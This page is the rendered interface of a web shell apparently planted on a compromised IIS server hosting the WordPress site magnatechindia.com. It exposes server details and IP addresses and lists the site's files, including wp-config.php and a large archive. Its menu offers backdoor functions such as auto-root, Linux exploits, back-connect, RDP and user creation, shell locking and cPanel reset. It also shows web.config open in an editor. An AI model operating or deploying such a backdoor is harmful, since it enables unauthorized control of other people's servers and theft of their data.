Windows NT WIN-K3URTCG1QHU 10.0 build 20348 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: 185.131.54.15 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
7.4.33
IWPD_188(magnatech)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
magnatechindia.com /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
App_Data
[ DIR ]
drwxrwxrwx
aspnet_client
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
test
[ DIR ]
drwxrwxrwx
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
616
B
-rw-rw-rw-
.user.ini
287
B
-rw-rw-rw-
favicon.ico
110.8
KB
-rw-rw-rw-
index.php
405
B
-rw-rw-rw-
license.txt
19.44
KB
-rw-rw-rw-
magnatech.zip
475.23
MB
-rw-rw-rw-
readme.html
7.23
KB
-rw-rw-rw-
web.config
2.74
KB
-rw-rw-rw-
wp-activate.php
7.54
KB
-rw-rw-rw-
wp-blog-header.php
351
B
-rw-rw-rw-
wp-comments-post.php
2.27
KB
-rw-rw-rw-
wp-config-sample.php
3.26
KB
-rw-rw-rw-
wp-config.php
2.66
KB
-rw-rw-rw-
wp-cron.php
5.49
KB
-rw-rw-rw-
wp-links-opml.php
2.43
KB
-rw-rw-rw-
wp-load.php
3.84
KB
-rw-rw-rw-
wp-login.php
51.3
KB
-rw-rw-rw-
wp-mail.php
8.52
KB
-rw-rw-rw-
wp-settings.php
61.12
KB
-rw-rw-rw-
wp-signup.php
34.26
KB
-rw-rw-rw-
wp-trackback.php
5.27
KB
-rw-rw-rw-
xmlrpc.php
3.13
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.config
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <directoryBrowse enabled="false" /> <rewrite> <rules> <rule name="WordPress: http://magnatechindia.com" patternSyntax="Wildcard"> <match url="*" /> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> <httpErrors> <remove statusCode="401" /> <error statusCode="401" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\unauthorized.html" /> <remove statusCode="403" /> <error statusCode="403" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\forbidden.html" /> <remove statusCode="404" /> <error statusCode="404" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\not_found.html" /> <remove statusCode="405" /> <error statusCode="405" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\method_not_allowed.html" /> <remove statusCode="406" /> <error statusCode="406" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\not_acceptable.html" /> <remove statusCode="412" /> <error statusCode="412" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\precondition_failed.html" /> <remove statusCode="500" /> <error statusCode="500" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\internal_server_error.html" /> <remove statusCode="501" /> <error statusCode="501" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\not_implemented.html" /> <remove statusCode="502" /> <error statusCode="502" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\bad_gateway.html" /> <remove statusCode="400" /> <error statusCode="400" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\bad_request.html" /> <remove statusCode="407" /> <error statusCode="407" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\proxy_authentication_required.html" /> <remove statusCode="414" /> <error statusCode="414" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\request-uri_too_long.html" /> <remove statusCode="415" /> <error statusCode="415" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\unsupported_media_type.html" /> <remove statusCode="503" /> <error statusCode="503" path="C:\Inetpub\vhosts\magnatechindia.com\error_docs\maintenance.html" /> </httpErrors> <tracing> <traceFailedRequests> <clear /> </traceFailedRequests> </tracing> </system.webServer> </configuration>
Close